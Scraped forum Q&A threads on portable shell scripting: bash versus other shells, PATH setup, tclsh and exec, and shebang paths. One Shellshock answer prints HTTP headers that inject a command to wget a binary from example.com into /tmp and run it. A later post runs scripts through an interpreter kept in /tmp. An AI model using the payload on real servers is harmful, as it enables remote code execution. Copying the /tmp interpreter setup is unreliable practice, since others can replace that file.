I should deploy some scripts that have been written for bash to various Linux/Unix machines where I may not have bash natively available.
I do not know if the original writer really required bash to run the scripts or it's just because it's default shell in modern Linuxes.
Do you know of any script, application or online service that takes as input a shell script, does some syntax checks using the grammar for several common shells and returns as output some kind of validation estimate like "This script should be run under one of the following shells: ash, bash, ksh, zsh".
I don't know of any tool that does what you're asking for, but there is one called checkbashisms that can at least check for non-portable syntax. IIRC, it's packaged in Ubuntu as part of the devscripts package.
Ubuntu also made the switch to having dash be the default shell and wrote a helpful page about coping with the change of making Dash be /bin/sh. I've found it to be a good reference.
Related
Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability.
I am trying to understand if it can affect my server via my Perl CGI scripts.
Can my code be affected in a malicious way - what would my code need to do to be affected? What should I check to verify this?
Yes it affects Perl if your CGI script spawns subshells, e.g., using the system() or open() functions or backticks. See this excellent Red Hat blog post. Note that the blog post is not Red Hat specific in any significant way.
Check your Perl CGI scripts for these functions, BUT FIRST UPGRADE BASH TO A FIXED VERSION!
You could try to set special crafted strings to the HTTP server als Referrer, Cookie, Host or Accept header which are then passed to (bash) CGI scripts:
GET./.HTTP/1.0 .User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:./
See https://gist.github.com/anonymous/929d622f3b36b00c0be1 as a real world example of malware which was seen in the wild.
If your Perl scripts do not call bash (by using system or open) you should be safe.
See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
The main question here is: is there a standard method of writing UNIX shell scripts that will run on multiple UNIX platforms.
For example, we have many hosts running different flavours of UNIX (Solaris, Linux) and at different versions all with slightly different file system layouts. Some hosts have whoami in /usr/local/gnu/bin/, and some in /usr/bin/.
All of our scripts seem to deal with this in a slightly different way. Some have case statements on the architecture:
case "`/script/that/determines/arch`" in
sunos-*) WHOAMI=`/usr/local/gnu/bin/whoami` ;;
*) WHOAMI=`/usr/bin/whoami` ;;
esac
With this approach you know exactly what binary is being executed, but it's pretty cumbersome if there are lots of commands being executed.
Some just set the PATH (based on the arch script above) and call commands by just their name. This is convenient, but you lose control over which command you run, e.g. if you have:
/bin/foo
/bin/bar
/other/bin/foo
/other/bin/bar
You wouldn't be able to use both /bin/foo and /other/bin/bar.
Another approach I could think of would to have a local directory on each host with symlinks to each binary that would be needed on each host. E.g.:
Solaris host:
/local-bin/whoami -> /usr/local/gnu/bin/whoami
/local-bin/ps -> /usr/ucb/ps
Linux host:
/local-bin/whoami -> /usr/bin/whoami
/local-bin/ps -> /usr/ps
What other approaches do people use? Please don't just say write the script in Python... there are some tasks where bash is the most succinct and practical means of getting a simple task accomplished.
I delegate all this to my .profile, which has an elaborate series of internal functions to try likely directories to add to the PATH. Except on OSX, which I believe is basically impossible because Darwin/Fink/Ports each wants to control your PATH, this approach works well enough.
If I cared about ambiguity (multiple instances of foo in different directories on my PATH), I would modify the functions so as to identify all ambiguous commands and require manual resolution. But for my environment, this has never been an issue. My main concern has been to have a single .profile that runs on Debian, Red Hat, Solaris, BSD, and so on. The 'try every directory that could possibly work' approach works well enough.
To set PATH to POSIX-compliant directories you can do the following at the beginning of your Bash scripts:
unset PATH
PATH="$(PATH=/bin:/usr/bin getconf PATH)"
export PATH
If you know you can use Bash across different Unix systems, you may use shell builtins instead of external commands to improve portability as well. Example:
help type
type -a type
type -P ls # replaces: which ls
To disable alias / function lookup for commands such as find, ls, ... in Bash you may use the command builtin. Example:
help command
command ls -l
If you want to be 100% sure to execute a specific command located in a specific directory, using the full executable path seems the way to go. First match wins in PATH lookup!
Bash commands are available from an interactive tclsh session. E.g. in a tclsh session you can have
% ls
instead of
$ exec ls
However, you cant have a tcl script which calls bash commands directly (i.e. without exec).
How can I make tclsh to recognize bash commands while interpreting tcl script files, just like it does in an interactive session?
I guess there is some tcl package (or something like that), which is being loaded automatically while launching an interactive session to support direct calls of bash commans. How can I load it manually in tcl script files?
If you want to have specific utilities available in your scripts, write bridging procedures:
proc ls args {
exec {*}[auto_execok ls] {*}$args
}
That will even work (with obvious adaptation) for most shell builtins or on Windows. (To be fair, you usually don't want to use an external ls; the internal glob command usually suffices, sometimes with extra help from some file subcommands.) Some commands need a little more work (e.g., redirecting input so it comes from the terminal, with an extra <#stdin or </dev/tty; that's needed for stty on some platforms) but that works reasonably well.
However, if what you're asking for is to have arbitrary execution of external programs without any extra code to mark that they are external, that's considered to be against the ethos of Tcl. The issue is that it makes the code quite a lot harder to maintain; it's not obvious that you're doing an expensive call-out instead of using something (relatively) cheap that's internal. Putting in the exec in that case isn't that onerous…
What's going on here is that the unknown proc is getting invoked when you type a command like ls, because that's not an existing tcl command, and by default, that command will check that if the command was invoked from an interactive session and from the top-level (not indirectly in a proc body) and it's checking to see if the proc name exists somewhere on the path. You can get something like this by writing your own proc unknown.
For a good start on this, examine the output of
info body unknown
One thing you should know is that ls is not a Bash command. It's a standalone utility. The clue for how tclsh runs such utilities is right there in its name - sh means "shell". So it's the rough equivalent to Bash in that Bash is also a shell. Tcl != tclsh so you have to use exec.
I have a bunch of scripts (which can't be modified) written on Windows. Windows allows relative paths in its #! commands. We are trying to run these scripts on Unix but Bash only seems to respect absolute paths in its #! directives. I've looked around but haven't been able to locate an option in Bash or a program designed to replace and interpreter name. Is it possible to override that functionality -- perhaps even by using a different shell?
Typically you can just specify the binary to execute the script, which will cause the #! to be ignored. So, if you have a Python script that looks like:
#!..\bin\python2.6
# code would be here.
On Unix/Linux you can just say:
prompt$ python2.6 <scriptfile>
And it'll execute using the command line binary. I view the hashbang line as one which asks the operating system to use the binary specified on the line, but you can override it by not executing the script as a normal executable.
Worst case you could write some wrapper scripts that would explicitly tell the interpreter to execute the code in the script file for all the platforms that you'd be using.
I manage a large number of shell (ksh) scripts on server A. Each script begins with the line...
#!/usr/bin/ksh
When I deploy to machine B, C, and D I frequently need to use a different shell such as /bin/ksh, /usr/local/bin/ksh or even /usr/dt/bin/ksh. Assume I am unable to install a new version of ksh and I am unable to create links in any protected directories such as /usr/local/bin. At the moment I have a sed script which modifies all the scripts but I would prefer not to do this. I would like to standardize the header so that it no longer needs to be changed from server to server. I don't mind using something like
#!~/ksh
And creating a link which is on every server but I have had problems with finding home using "~" in the past when using rsh (maybe is was ssh) to call a script (AIX specifically I think). Another option might be to create a link in my home directory and ensuring that it is first in my PATH, and simply using
#!ksh
Looking for a good solution. Thanks.
Update 8/26/11 - Here is the solution I came up with. The installation script looks for the various versions of ksh installed on the server and then copies one of the ksh 93 programs to /tmp/ksh93. The scripts in the framework all refer to #!/tmp/ksh93 and they don't need to be changed from one server to the other. The script also set some variables so that if the file is every removed from /tmp, it will immediately be put back the next time a scheduled task runs, which is at a minimum every minute.
As rettops noted, you can use:
#!/usr/bin/env ksh
This will likely work for you. However, there can be some drawbacks. See Wikipedia on Shebang for a fairly thorough discussion.
#! /usr/bin/env ksh
will use whatever ksh is in the user's path.